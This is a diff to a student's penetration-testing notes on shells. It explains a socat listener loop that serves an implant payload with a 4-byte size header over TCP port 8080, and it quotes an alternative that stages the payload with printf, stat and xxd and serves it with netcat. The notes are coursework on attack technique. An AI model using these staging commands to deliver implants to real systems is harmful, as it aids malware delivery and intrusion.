Ali-Mikael/Pen-testing/h6-shells.md

 done
 ```
 **Explained**
-- The `while true` makes sure the listener restarts automatically after each connection
+- `while true`: Ensure the listener _restarts automatically after each connection_
-- `(` starts a subshell so we can pipe multiple commands into one output stream
+- `(`: Start a `subshell` so we can _pipe multiple commands into one output stream_
+- `stat`: Get the _file size in bytes_
-- The `printf` line gets the file size of the implant and formats it as an 8 char hex value
+  - `printf`: Format as 8 character hex value (`%08x`)
-- `xxd -p -r` converts the hex value into raw bytes for transmission
+  - `xxd -p -r`: Convert the value into raw bytes for transmission
+  - All in all: Creates a 4 byte binary header that contains the size of the payload
-- `cat`  outputs the raw payload bytes immediately after the size header
+- `cat`: Output the raw payload bytes after the header
-- `)` Ends the subshell
+- `)` End the `subshell`
-- `socat` serves the staged payload over `TCP` via port `8080` and rebinds the port after disconnects
+- `socat` serve the staged payload over `TCP` via port `8080` and rebind the port after disconnects
 - Source: Man pages, experience and logic.
-For the `printf` statement I had to ask chatGPT "what does this do" 😂
+For the `printf / (stat)` statement I had to ask chatGPT "what does this do" 😂

 > [!NOTE]
-> I borrowed the basic idea from the guy who wrote the TCP stager.
+> I got idea from the guy who wrote the TCP stager.
 His solution was two commands:
 > ```bash
 > $ printf "%08x" "$(stat --format '%s' DISABLED_ABROAD)" | xxd -p -r > DISABLED_ABROAD_staged
 > $ cat DISABLED_ABROAD_staged | nc -lvp 80 -s 192.168.45.199